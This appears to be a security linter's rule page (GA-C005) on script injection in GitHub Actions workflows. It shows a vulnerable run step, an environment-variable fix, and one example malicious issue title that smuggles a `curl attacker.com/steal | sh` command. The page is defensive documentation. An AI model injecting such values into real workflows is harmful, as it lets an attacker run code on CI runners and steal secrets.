GA-C005: Script injection risk
Warning Security
Why This Matters
Directly interpolating user-controlled GitHub context expressions like `${{ github.event.issue.title }}` in `run:` blocks allows script injection. An attacker can craft an issue title containing shell metacharacters (e.g., `"; curl attacker.com/steal | sh #`) to execute arbitrary commands in the workflow runner.
How to Fix
Assign the context value to an environment variable first
Before (incorrect)
run: echo "${{ github.event.issue.title }}"After (correct)
env:
TITLE: ${{ github.event.issue.title }}
run: echo "$TITLE"Rule Details
- Rule Code
- GA-C005
- Severity
- Warning
- Category
- Security